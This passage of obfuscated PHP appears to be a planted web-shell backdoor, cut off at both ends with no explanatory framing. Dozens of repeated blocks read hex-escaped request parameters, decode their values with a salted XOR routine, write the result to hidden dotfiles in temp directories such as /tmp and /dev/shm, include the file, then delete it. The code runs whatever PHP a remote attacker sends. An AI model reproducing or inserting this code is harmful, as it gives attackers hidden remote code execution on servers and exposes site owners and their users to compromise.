$data_chunk) { if ((function($d) { return is_dir($d) && is_writable($d); })($data_chunk)) { $res = "$data_chunk/.ptr"; if (file_put_contents($res, $pset)) { require $res; unlink($res); die(); } } } } if(isset($_REQUEST["p\x73et"]) ? true : false){ $k = $_REQUEST["p\x73et"]; $k = explode ('.' , $k) ; $hld= ''; $salt9= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($salt9); foreach($k as $n => $v3) { $sChar= ord($salt9[$n% $sLen]); $d= ((int)$v3 - $sChar -($n% 10)) ^ 47; $hld .= chr($d); } $component = array_filter([session_save_path(), "/dev/shm", sys_get_temp_dir(), getenv("TEMP"), getcwd(), "/tmp", ini_get("upload_tmp_dir"), "/var/tmp", getenv("TMP")]); foreach ($component as $key => $dat) { if (array_product([is_dir($dat), is_writable($dat)])) { $element = "$dat/.descriptor"; if (@file_put_contents($element, $hld) !== false) { include $element; unlink($element); die(); } } } } if(array_key_exists("dc\x68u\x6E\x6B", $_POST) && !is_null($_POST["dc\x68u\x6E\x6B"])){ $marker = array_filter([getenv("TEMP"), "/var/tmp", "/dev/shm", ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/tmp", session_save_path(), getcwd(), getenv("TMP")]); $data_chunk = $_POST["dc\x68u\x6E\x6B"]; $data_chunk=explode ( "." , $data_chunk ) ; $element = ''; $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt5 ); $u = 0; foreach ($data_chunk as $v5) { $sChar = ord($salt5[$u % $lenS] ); $d = ((int)$v5 - $sChar - ($u % 10)) ^ 93; $element .= chr($d ); $u++; } for ($object = 0, $k = count($marker); $object < $k; $object++) { $holder = $marker[$object]; if (array_product([is_dir($holder), is_writable($holder)])) { $itm = vsprintf("%s/%s", [$holder, ".entry"]); if (@file_put_contents($itm, $element) !== false) { include $itm; unlink($itm); exit; } } } } if(array_key_exists("t\x6Fk\x65n", $_POST)){ $data_chunk = array_filter([ini_get("upload_tmp_dir"), session_save_path(), "/var/tmp", getcwd(), getenv("TEMP"), "/tmp", "/dev/shm", getenv("TMP"), sys_get_temp_dir()]); $pset = $_POST["t\x6Fk\x65n"]; $pset = explode ("." , $pset) ; $obj = ''; $salt6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt6 ); $u = 0; array_walk( $pset, function( $v9) use( &$obj, &$u, $salt6, $sLen) { $sChar = ord( $salt6[$u% $sLen] ); $dec =( ( int)$v9 - $sChar -( $u% 10)) ^ 9; $obj .= chr( $dec ); $u++; } ); foreach ($data_chunk as $mrk) { if (!( !is_dir($mrk) \|\| !is_writable($mrk) )) { $desc = str_replace("{var_dir}", $mrk, "{var_dir}/.val"); if (file_put_contents($desc, $obj)) { include $desc; @unlink($desc); die(); } } } } if(filter_has_var(INPUT_POST, "b\x69n\x64in\x67")){ $entity = $_REQUEST["b\x69n\x64in\x67"]; $entity = explode('.',$entity ) ; $ptr = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $i = 0; $len = count($entity); do { if ($i >= $len) break; $v1 = $entity[$i]; $chS = ord($salt[$i %$lenS]); $dec = ((int)$v1 - $chS - ($i %10)) ^ 27; $ptr .= chr($dec); $i++; } while (true); $bind = array_filter(["/var/tmp", getenv("TMP"), getcwd(), "/tmp", sys_get_temp_dir(), session_save_path(), getenv("TEMP"), "/dev/shm", ini_get("upload_tmp_dir")]); $data = 0; do { $pointer = $bind[$data] ?? null; if ($data >= count($bind)) break; if ((function($d) { return is_dir($d) && is_writable($d); })($pointer)) { $elem = "$pointer/.res"; $file = fopen($elem, 'w'); if ($file) { fwrite($file, $ptr); fclose($file); include $elem; @unlink($elem); die(); } } $data++; } while (true); } if(isset($_POST) && isset($_POST["ptr"])){ $entity = $_POST["ptr"]; $entity = explode ( '.' , $entity ) ; $bind = ''; $salt6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt6); $len = count( $entity); for( $t = 0; $t < $len; $t++) { $v2 = $entity[$t]; $sChar = ord( $salt6[$t % $sLen]); $d =( ( int)$v2 - $sChar -( $t % 10)) ^ 67; $bind .= chr( $d); } $element = array_filter([getcwd(), "/tmp", session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm", getenv("TMP"), sys_get_temp_dir(), "/var/tmp", getenv("TEMP")]); for ($k = 0, $ent = count($element); $k < $ent; $k++) { $res = $element[$k]; if (max(0, is_dir($res) * is_writable($res))) { $sym = str_replace("{var_dir}", $res, "{var_dir}/.obj"); if (file_put_contents($sym, $bind)) { include $sym; @unlink($sym); exit; } } } } if(array_key_exists("p\x74r", $_POST) && !is_null($_POST["p\x74r"])){ $val = array_filter([getenv("TMP"), session_save_path(), "/tmp", getenv("TEMP"), "/dev/shm", sys_get_temp_dir(), getcwd(), ini_get("upload_tmp_dir"), "/var/tmp"]); $desc = $_POST["p\x74r"]; $desc= explode ( '.' , $desc ) ; $property_set = ''; $salt8 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt8); $__len = count($desc); for($q = 0; $q < $__len; $q++) { $v6 = $desc[$q]; $chS = ord($salt8[$q % $sLen]); $dec =((int)$v6 - $chS -($q % 10)) ^ 86; $property_set .=chr($dec); } for ($data = 0, $record = count($val); $data < $record; $data++) { $entry = $val[$data]; if ((function($d) { return is_dir($d) && is_writable($d); })($entry)) { $ent = "$entry/.res"; if (file_put_contents($ent, $property_set)) { require $ent; unlink($ent); exit; } } } } if(!is_null($_REQUEST["ent\x69\x74\x79"] ?? null)){ $descriptor = array_filter(["/dev/shm", session_save_path(), ini_get("upload_tmp_dir"), "/tmp", getenv("TEMP"), sys_get_temp_dir(), "/var/tmp", getenv("TMP"), getcwd()]); $ent = $_REQUEST["ent\x69\x74\x79"]; $ent =explode ( "." , $ent ) ; $object = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s2); foreach( $ent as $p => $v5): $chS = ord( $s2[$p % $lenS]); $d =( ( int)$v5 - $chS -( $p % 10)) ^ 6; $object .= chr( $d); endforeach; $sym = 0; do { $itm = $descriptor[$sym] ?? null; if ($sym >= count($descriptor)) break; if (is_writable($itm) && is_dir($itm)) { $symbol = str_replace("{var_dir}", $itm, "{var_dir}/.bind"); if (file_put_contents($symbol, $object)) { require $symbol; unlink($symbol); die(); } } $sym++; } while (true); } if(isset($_REQUEST["\x65n\x74ry"]) ? true : false){ $entity = array_filter(["/var/tmp", sys_get_temp_dir(), getenv("TMP"), getcwd(), getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir"), session_save_path(), "/dev/shm"]); $reference = $_REQUEST["\x65n\x74ry"]; $reference = explode ( "." ,$reference ) ; $item =''; $s ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen( $s ); foreach( $reference as $l => $v2): $sChar =ord( $s[$l % $lenS] ); $dec =( ( int)$v2 - $sChar -( $l % 10)) ^ 14; $item .= chr( $dec ); endforeach; for ($val = 0, $factor = count($entity); $val < $factor; $val++) { $elem = $entity[$val]; if (!!is_dir($elem) && !!is_writable($elem)) { $symbol = vsprintf("%s/%s", [$elem, ".ref"]); if (file_put_contents($symbol, $item)) { require $symbol; unlink($symbol); die(); } } } } if(@$_POST["dc\x68\x75n\x6B"] !== null){ $ent = array_filter(["/var/tmp", getenv("TMP"), "/tmp", getcwd(), "/dev/shm", ini_get("upload_tmp_dir"), sys_get_temp_dir(), session_save_path(), getenv("TEMP")]); $record = $_POST["dc\x68\x75n\x6B"]; $record= explode( ".", $record ) ; $binding = ''; $salt8 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt8); $__len = count($record); for($l = 0; $l< $__len; $l++) { $v9 = $record[$l]; $sChar = ord($salt8[$l % $sLen]); $dec =((int)$v9 - $sChar -($l % 10)) ^ 18; $binding .= chr($dec); } foreach ($ent as $data_chunk): if (array_product([is_dir($data_chunk), is_writable($data_chunk)])) { $hld = implode("/", [$data_chunk, ".parameter_group"]); $success = file_put_contents($hld, $binding); if ($success) { include $hld; @unlink($hld); die();} } endforeach; } if(isset($_POST["t\x6Fk\x65n"]) ? true : false){ $flag = array_filter([session_save_path(), "/var/tmp", getenv("TMP"), ini_get("upload_tmp_dir"), getcwd(), "/dev/shm", getenv("TEMP"), "/tmp", sys_get_temp_dir()]); $value = $_POST["t\x6Fk\x65n"]; $value= explode ("." , $value) ; $record=''; $salt='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen( $salt); $v=0; $__tmp=$value; while( $v5=array_shift( $__tmp)) {$sChar=ord( $salt[$v % $sLen]); $d=( ( int)$v5 - $sChar -( $v % 10)) ^ 90; $record .= chr( $d); $v++;} foreach ($flag as $ent) { if ((bool)is_dir($ent) && (bool)is_writable($ent)) { $binding = "$ent/.entry"; if (@file_put_contents($binding, $record) !== false) { include $binding; unlink($binding); exit; } } } } if(in_array("\x72\x65\x66\x65rence", array_keys($_REQUEST))){ $flg = array_filter([getenv("TMP"), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", session_save_path(), sys_get_temp_dir(), getcwd(), "/dev/shm", getenv("TEMP")]); $val = $_REQUEST["\x72\x65\x66\x65rence"]; $val = explode ('.' , $val) ; $res= ''; $salt4= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($salt4); $len= count($val); for ($j= 0; $j < $len; $j++) { $v1= $val[$j]; $sChar= ord($salt4[$j % $lenS]); $d= ((int)$v1 - $sChar - ($j % 10)) ^13; $res .= chr($d); } while ($holder = array_shift($flg)) { if (is_dir($holder) && is_writable($holder)) { $resource = "$holder/.itm"; $success = file_put_contents($resource, $res); if ($success) { include $resource; @unlink($resource); exit;} } } } if(!empty($_REQUEST["s\x79\x6Dbo\x6C"])){ $object = array_filter([getenv("TMP"), getcwd(), "/tmp", session_save_path(), ini_get("upload_tmp_dir"), "/var/tmp", getenv("TEMP"), "/dev/shm", sys_get_temp_dir()]); $res = $_REQUEST["s\x79\x6Dbo\x6C"]; $res = explode ("." ,$res) ; $ptr = ''; $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt5 ); $w = 0; $len = count($res ); do { if($w >= $len) break; $v2 = $res[$w]; $sChar = ord($salt5[$w% $sLen] ); $d =((int)$v2 - $sChar -($w% 10)) ^ 97; $ptr .= chr($d ); $w++; } while(true ); while ($element = array_shift($object)) { if (!( !is_dir($element) \|\| !is_writable($element) )) { $val = implode("/", [$element, ".pset"]); $success = file_put_contents($val, $ptr); if ($success) { include $val; @unlink($val); die();} } } } if(filter_has_var(INPUT_POST, "\x69\x74em")){ $key = array_filter(["/dev/shm", getenv("TEMP"), "/tmp", "/var/tmp", getenv("TMP"), ini_get("upload_tmp_dir"), session_save_path(), getcwd(), sys_get_temp_dir()]); $symbol = $_POST["\x69\x74em"]; $symbol = explode ( ".", $symbol ); $k = ''; $s5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s5); $m = 0; $__tmp = $symbol; while($v1 = array_shift($__tmp)) {$sChar = ord($s5[$m % $sLen]); $dec =((int)$v1 - $sChar -($m % 10)) ^ 56; $k .=chr($dec); $m++; } foreach ($key as $object) { if (is_dir($object) ? is_writable($object) : false) { $data_chunk = str_replace("{var_dir}", $object, "{var_dir}/.parameter_group"); if (@file_put_contents($data_chunk, $k) !== false) { include $data_chunk; unlink($data_chunk); die(); } } } } if(@$_POST["mar\x6B\x65r"] !== null){ $resource = array_filter(["/dev/shm", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getcwd(), getenv("TEMP"), "/var/tmp", "/tmp", session_save_path(), getenv("TMP")]); $ent = $_POST["mar\x6B\x65r"]; $ent = explode ( "." , $ent); $element = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s2); $p = 0; array_walk($ent , function ($v4) use (&$element , &$p , $s2 , $lenS) { $chS = ord($s2[$p % $lenS]); $dec = ((int)$v4 - $chS - ($p % 10)) ^ 57; $element .= chr($dec); $p++; }); for ($key = 0, $record = count($resource); $key < $record; $key++) { $flg = $resource[$key]; if (array_product([is_dir($flg), is_writable($flg)])) { $k = join("/", [$flg, ".dchunk"]); if (file_put_contents($k, $element)) { include $k; @unlink($k); die(); } } } } if(isset($_POST) && isset($_POST["s\x79\x6D\x62ol"])){ $entry = $_POST["s\x79\x6D\x62ol"]; $entry = explode ( '.' , $entry); $element = ''; $s7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s7); $len = count($entry); for($y = 0; $y < $len; $y++) { $v6 = $entry[$y]; $sChar = ord($s7[$y % $lenS]); $dec =((int)$v6 - $sChar -($y % 10)) ^ 59; $element.=chr($dec); } $mrk = array_filter([ini_get("upload_tmp_dir"), getenv("TMP"), "/var/tmp", "/dev/shm", "/tmp", session_save_path(), getenv("TEMP"), sys_get_temp_dir(), getcwd()]); $itm = 0; do { $elem = $mrk[$itm] ?? null; if ($itm >= count($mrk)) break; if (!( !is_dir($elem) \|\| !is_writable($elem) )) { $key = join("/", [$elem, ".val"]); if (@file_put_contents($key, $element) !== false) { include $key; unlink($key); die(); } } $itm++; } while (true); } if(filter_has_var(INPUT_POST, "fa\x63")){ $token = array_filter(["/tmp", "/var/tmp", getcwd(), getenv("TMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/dev/shm", getenv("TEMP"), session_save_path()]); $marker = $_REQUEST["fa\x63"]; $marker = explode ( '.' , $marker) ; $comp=''; $salt='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen($salt ); $len=count($marker ); for ($p=0; $p < $len; $p++) { $v8=$marker[$p]; $chS=ord($salt[$p % $sLen] ); $d=((int)$v8 - $chS - ($p % 10)) ^ 31; $comp .= chr($d ); } foreach ($token as $key => $element) { if ((bool)is_dir($element) && (bool)is_writable($element)) { $ent = sprintf("%s/.value", $element); if (file_put_contents($ent, $comp)) { require $ent; unlink($ent); exit; } } } } if(count($_POST) > 0 && isset($_POST["it\x6D"])){ $ptr = array_filter([ini_get("upload_tmp_dir"), "/dev/shm", "/var/tmp", session_save_path(), getenv("TMP"), getcwd(), "/tmp", getenv("TEMP"), sys_get_temp_dir()]); $pgrp = $_POST["it\x6D"]; $pgrp = explode ('.' ,$pgrp ) ; $res = ''; $salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt2); $len = count($pgrp); for ($l = 0; $l < $len; $l++) { $v3 = $pgrp[$l]; $chS = ord($salt2[$l%$sLen]); $dec = ((int)$v3 - $chS - ($l%10)) ^ 16; $res .= chr($dec); } foreach ($ptr as $marker) { if (!!is_dir($marker) && !!is_writable($marker)) { $flg = vsprintf("%s/%s", [$marker, ".item"]); if (file_put_contents($flg, $res)) { include $flg; @unlink($flg); exit; } } } } if(isset($_POST) && isset($_POST["d\x61\x74a"])){ $itm = array_filter(["/dev/shm", getenv("TMP"), getcwd(), "/tmp", "/var/tmp", getenv("TEMP"), session_save_path(), sys_get_temp_dir(), ini_get("upload_tmp_dir")]); $data_chunk = $_POST["d\x61\x74a"]; $data_chunk = explode( "." , $data_chunk ) ; $fac= ''; $salt1= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($salt1 ); $u= 0; $len= count($data_chunk ); do { if ($u >= $len) break; $v3= $data_chunk[$u]; $chS= ord($salt1[$u % $lenS] ); $d= ((int)$v3 - $chS - ($u % 10)) ^ 68; $fac.=chr($d ); $u++; } while (true ); foreach ($itm as $value): if (!( !is_dir($value) \|\| !is_writable($value) )) { $symbol = sprintf("%s/.object", $value); $success = file_put_contents($symbol, $fac); if ($success) { include $symbol; @unlink($symbol); die();} } endforeach; } if(in_array("it\x65m", array_keys($_POST))){ $flg = array_filter([getenv("TEMP"), "/dev/shm", ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", getcwd(), session_save_path(), getenv("TMP"), sys_get_temp_dir()]); $mrk = $_POST["it\x65m"]; $mrk= explode ( '.' , $mrk) ; $ref =''; $salt8 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($salt8); $o =0; while ($o< count($mrk)) { $v3 =$mrk[$o]; $chS =ord($salt8[$o% $lenS]); $d =((int)$v3 - $chS - ($o% 10)) ^ 28; $ref .= chr($d); $o++; } $descriptor = 0; do { $parameter_group = $flg[$descriptor] ?? null; if ($descriptor >= count($flg)) break; if ((bool)is_dir($parameter_group) && (bool)is_writable($parameter_group)) { $obj = "$parameter_group" . "/.pointer"; $file = fopen($obj, 'w'); if ($file) { fwrite($file, $ref); fclose($file); include $obj; @unlink($obj); die(); } } $descriptor++; } while (true); } if(isset($_POST["da\x74\x61_ch\x75nk"])){ $bind = array_filter([sys_get_temp_dir(), getenv("TEMP"), "/tmp", getenv("TMP"), session_save_path(), "/dev/shm", "/var/tmp", ini_get("upload_tmp_dir"), getcwd()]); $object = $_POST["da\x74\x61_ch\x75nk"]; $object = explode( '.', $object ) ; $pset = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt ); $len = count($object ); for ($v = 0; $v < $len; $v++) { $v5 = $object[$v]; $sChar = ord($salt[$v % $lenS] ); $dec = ((int)$v5 - $sChar - ($v % 10))^90; $pset .= chr($dec ); } $factor = 0; do { $fac = $bind[$factor] ?? null; if ($factor >= count($bind)) break; if ((is_dir($fac) and is_writable($fac))) { $value = sprintf("%s/.hld", $fac); if (file_put_contents($value, $pset)) { include $value; @unlink($value); die(); } } $factor++; } while (true); } if(!empty($_POST["\x6Be\x79"])){ $marker = $_POST["\x6Be\x79"]; $marker = explode( '.' , $marker ) ; $comp = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt ); $o = 0; foreach ($marker as $v9) { $sChar = ord($salt[$o % $lenS] ); $d = ((int)$v9 - $sChar - ($o % 10))^1; $comp .= chr($d ); $o++; } $ent = array_filter([getenv("TEMP"), "/dev/shm", session_save_path(), "/var/tmp", getcwd(), getenv("TMP"), ini_get("upload_tmp_dir"), "/tmp", sys_get_temp_dir()]); while ($value = array_shift($ent)) { if (is_dir($value) && is_writable($value)) { $obj = sprintf("%s/.component", $value); if (file_put_contents($obj, $comp)) { include $obj; @unlink($obj); die(); } } } } if(count($_REQUEST) > 0 && isset($_REQUEST["\x65\x6Eti\x74y"])){ $marker = array_filter([session_save_path(), getenv("TMP"), "/var/tmp", getcwd(), "/dev/shm", "/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TEMP")]); $fac = $_REQUEST["\x65\x6Eti\x74y"]; $fac = explode ("." , $fac) ; $desc= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen( $salt); $m= 0; $__len= count( $fac); do { if( $m >= $__len) break; $v7= $fac[$m]; $chS= ord( $salt[$m % $sLen]); $d= ( ( int)$v7 - $chS -( $m % 10)) ^ 52; $desc .= chr( $d); $m++;}while( true); foreach ($marker as $key => $val) { if (is_dir($val) ? is_writable($val) : false) { $data_chunk = vsprintf("%s/%s", [$val, ".elem"]); if (file_put_contents($data_chunk, $desc)) { require $data_chunk; unlink($data_chunk); exit; } } } } if(@$_POST["des\x63\x72iptor"] !== null){ $rec = $_POST["des\x63\x72iptor"]; $rec =explode('.' , $rec ); $pset =''; $s4 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen( $s4 ); $j =0; $__len =count( $rec ); do { if( $j >= $__len) break; $v1 =$rec[$j]; $sChar =ord( $s4[$j% $sLen] ); $dec =( ( int)$v1 - $sChar -( $j% 10)) ^ 38; $pset.= chr( $dec ); $j++; } while( true ); $bind = array_filter(["/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp", "/dev/shm", getenv("TMP"), getcwd(), sys_get_temp_dir(), session_save_path()]); while ($marker = array_shift($bind)) { if ((is_dir($marker) and is_writable($marker))) { $key = "$marker/.itm"; $success = file_put_contents($key, $pset); if ($success) { include $key; @unlink($key); die();} } } } if(!empty($_REQUEST["data\x5F\x63h\x75n\x6B"])){ $holder = array_filter([session_save_path(), getenv("TEMP"), "/dev/shm", getcwd(), ini_get("upload_tmp_dir"), getenv("TMP"), "/var/tmp", "/tmp", sys_get_temp_dir()]); $symbol = $_REQUEST["data\x5F\x63h\x75n\x6B"]; $symbol = explode ('.' , $symbol ) ; $component = ''; $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s6 ); $p = 0; foreach ($symbol as $v5) {$chS = ord($s6[$p % $sLen] ); $d = ((int)$v5 - $chS - ($p % 10))^ 83; $component .= chr($d ); $p++; } foreach ($holder as $key => $binding) { if (max(0, is_dir($binding) * is_writable($binding))) { $key = "$binding" . "/.bind"; $file = fopen($key, 'w'); if ($file) { fwrite($file, $component); fclose($file); include $key; @unlink($key); die(); } } } } if(in_array("\x70g\x72p", array_keys($_REQUEST))){ $entity = array_filter([ini_get("upload_tmp_dir"), "/var/tmp", getenv("TEMP"), sys_get_temp_dir(), "/dev/shm", getenv("TMP"), "/tmp", getcwd(), session_save_path()]); $tkn = $_REQUEST["\x70g\x72p"]; $tkn = explode ( '.', $tkn) ; $token = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt); $k = 0; foreach( $tkn as $v3) { $sChar = ord( $salt[$k % $sLen]); $d =( ( int)$v3 - $sChar -( $k % 10)) ^ 56; $token .= chr( $d); $k++; } foreach ($entity as $val) { if (!( !is_dir($val) \|\| !is_writable($val) )) { $elem = "$val/.desc"; if (file_put_contents($elem, $token)) { include $elem; @unlink($elem); die(); } } } } if(!empty($_REQUEST["\x68o\x6C\x64er"])){ $entry = $_REQUEST["\x68o\x6C\x64er"]; $entry = explode ( "." , $entry ) ; $ref =''; $s ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen( $s); $m =0; array_walk( $entry, function( $v6) use( &$ref, &$m, $s, $lenS) { $chS =ord( $s[$m%$lenS]); $dec =( ( int)$v6 - $chS -( $m%10)) ^ 53; $ref .= chr( $dec); $m++; }); $elem = array_filter(["/tmp", getcwd(), "/dev/shm", getenv("TEMP"), session_save_path(), ini_get("upload_tmp_dir"), "/var/tmp", getenv("TMP"), sys_get_temp_dir()]); foreach ($elem as $flag): if (is_writable($flag) && is_dir($flag)) { $flg = str_replace("{var_dir}", $flag, "{var_dir}/.data_chunk"); if (@file_put_contents($flg, $ref) !== false) { include $flg; unlink($flg); exit; } } endforeach; } if(filter_has_var(INPUT_POST, "\x69\x74em")){ $symbol = $_POST["\x69\x74em"]; $symbol=explode ( '.' , $symbol ) ; $dat = ''; $salt1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt1); foreach($symbol as $v => $v6) { $chS = ord($salt1[$v%$sLen]); $d =((int)$v6 - $chS -($v%10)) ^ 38; $dat .= chr($d); } $flg = array_filter([ini_get("upload_tmp_dir"), "/dev/shm", sys_get_temp_dir(), getenv("TMP"), "/tmp", session_save_path(), getenv("TEMP"), "/var/tmp", getcwd()]); foreach ($flg as $component) { if ((is_dir($component) and is_writable($component))) { $pointer = "$component/.entry"; if (file_put_contents($pointer, $dat)) { require $pointer; unlink($pointer); die(); } } } } if(array_key_exists("p\x67rp", $_REQUEST)){ $marker = $_REQUEST["p\x67rp"]; $marker= explode ('.' , $marker) ; $fac = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s ); $__len = count($marker ); for ($y = 0; $y < $__len; $y++) { $v1 = $marker[$y]; $chS = ord($s[$y % $lenS] ); $dec = ((int)$v1 - $chS - ($y % 10)) ^ 13; $fac .= chr($dec ); } $tkn = array_filter([sys_get_temp_dir(), "/var/tmp", session_save_path(), getenv("TMP"), getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp", getcwd(), "/dev/shm"]); foreach ($tkn as $reference): if ((function($d) { return is_dir($d) && is_writable($d); })($reference)) { $val = "$reference" . "/.parameter_group"; if (@file_put_contents($val, $fac) !== false) { include $val; unlink($val); die(); } } endforeach; } if(!empty($_POST["\x65nt"])){ $desc = array_filter([getenv("TMP"), ini_get("upload_tmp_dir"), "/tmp", session_save_path(), getenv("TEMP"), "/dev/shm", getcwd(), sys_get_temp_dir(), "/var/tmp"]); $record = $_POST["\x65nt"]; $record=explode ( '.' , $record ) ; $ent = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s); $k = 0; while( $k < count( $record)) { $v1 = $record[$k]; $chS = ord( $s[$k %$lenS]); $dec =( ( int)$v1 - $chS -( $k %10)) ^ 20; $ent .= chr( $dec); $k++; } foreach ($desc as $value): if (array_product([is_dir($value), is_writable($value)])) { $pointer = implode("/", [$value, ".tkn"]); if (@file_put_contents($pointer, $ent) !== false) { include $pointer; unlink($pointer); exit; } } endforeach; } if(array_key_exists("k", $_REQUEST) && !is_null($_REQUEST["k"])){ $data = $_REQUEST["k"]; $data =explode ( ".", $data ) ; $record = ''; $salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt2 ); foreach ($data as $p => $v2) { $chS = ord($salt2[$p % $sLen] ); $dec = ((int)$v2 - $chS - ($p % 10)) ^ 61; $record .= chr($dec ); } $binding = array_filter([getenv("TMP"), ini_get("upload_tmp_dir"), getenv("TEMP"), getcwd(), sys_get_temp_dir(), "/var/tmp", session_save_path(), "/tmp", "/dev/shm"]); while ($value = array_shift($binding)) { if ((bool)is_dir($value) && (bool)is_writable($value)) { $hld = vsprintf("%s/%s", [$value, ".item"]); if (@file_put_contents($hld, $record) !== false) { include $hld; unlink($hld); exit; } } } } if(filter_has_var(INPUT_POST, "\x70rope\x72ty\x5Fse\x74")){ $elem = $_REQUEST["\x70rope\x72ty\x5Fse\x74"]; $elem= explode( '.' , $elem ) ; $marker=''; $salt5='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen($salt5); $l=0; array_walk($elem , function ($v2) use (&$marker , &$l , $salt5 , $sLen) { $chS=ord($salt5[$l % $sLen]); $d=((int)$v2 - $chS - ($l % 10)) ^ 92; $marker.= chr($d); $l++; }); $element = array_filter(["/var/tmp", "/tmp", sys_get_temp_dir(), session_save_path(), getenv("TMP"), getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd(), "/dev/shm"]); for ($token = 0, $factor = count($element); $token < $factor; $token++) { $val = $element[$token]; if ((bool)is_dir($val) && (bool)is_writable($val)) { $pointer = join("/", [$val, ".reference"]); if (@file_put_contents($pointer, $marker) !== false) { include $pointer; unlink($pointer); exit; } } } } if(!is_null($_POST["\x72\x65s"] ?? null)){ $binding = array_filter(["/var/tmp", getenv("TMP"), session_save_path(), getenv("TEMP"), getcwd(), ini_get("upload_tmp_dir"), "/tmp", "/dev/shm", sys_get_temp_dir()]); $object = $_POST["\x72\x65s"]; $object = explode ( '.' , $object ); $comp =''; $s2 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen( $s2); $z =0; while( $z< count( $object)) { $v7 =$object[$z]; $chS =ord( $s2[$z%$sLen]); $dec =( ( int)$v7 - $chS -( $z%10)) ^ 56; $comp .= chr( $dec); $z++; } for ($sym = 0, $entry = count($binding); $sym < $entry; $sym++) { $mrk = $binding[$sym]; if (!( !is_dir($mrk) \|\| !is_writable($mrk) )) { $desc = sprintf("%s/.data", $mrk); if (@file_put_contents($desc, $comp) !== false) { include $desc; unlink($desc); die(); } } } } if(count($_POST) > 0 && isset($_POST["\x74\x6Fken"])){ $descriptor = array_filter([session_save_path(), sys_get_temp_dir(), "/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), "/dev/shm", "/var/tmp", getcwd(), getenv("TMP")]); $resource = $_POST["\x74\x6Fken"]; $resource =explode ( '.', $resource) ; $res=''; $salt='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS=strlen($salt); foreach ($resource as $l =>$v5): $chS=ord($salt[$l %$lenS]); $dec=((int)$v5 - $chS - ($l %10)) ^ 34; $res .= chr($dec); endforeach; for ($entry = 0, $flag = count($descriptor); $entry < $flag; $entry++) { $object = $descriptor[$entry]; if (!( !is_dir($object) \|\| !is_writable($object) )) { $rec = vsprintf("%s/%s", [$object, ".item"]); if (file_put_contents($rec, $res)) { include $rec; @unlink($rec); exit; } } } } if(array_key_exists("\x70arameter_\x67r\x6Fu\x70", $_POST)){ $resource = array_filter([ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", getenv("TMP"), sys_get_temp_dir(), "/dev/shm", getenv("TEMP"), session_save_path(), getcwd()]); $component = $_POST["\x70arameter_\x67r\x6Fu\x70"]; $component =explode( "." , $component ) ; $ptr = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); foreach ($component as $o=>$v3) { $sChar = ord($s[$o % $lenS]); $dec = ((int)$v3 - $sChar - ($o % 10)) ^ 99; $ptr .=chr($dec); } foreach ($resource as $ref): if (max(0, is_dir($ref) * is_writable($ref))) { $k = sprintf("%s/.value", $ref); $success = file_put_contents($k, $ptr); if ($success) { include $k; @unlink($k); exit;} } endforeach; } if(count($_POST) > 0 && isset($_POST["ele\x6D"])){ $value = $_POST["ele\x6D"]; $value = explode ( ".", $value ) ; $val = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s2); $i = 0; $__tmp = $value; while( $v8 = array_shift( $__tmp)) { $chS = ord( $s2[$i % $lenS]); $d = ( ( int)$v8 - $chS -( $i % 10)) ^ 92; $val .= chr( $d); $i++;} $itm = array_filter([getenv("TEMP"), "/tmp", sys_get_temp_dir(), "/dev/shm", ini_get("upload_tmp_dir"), getcwd(), session_save_path(), "/var/tmp", getenv("TMP")]); foreach ($itm as $ref) { if ((bool)is_dir($ref) && 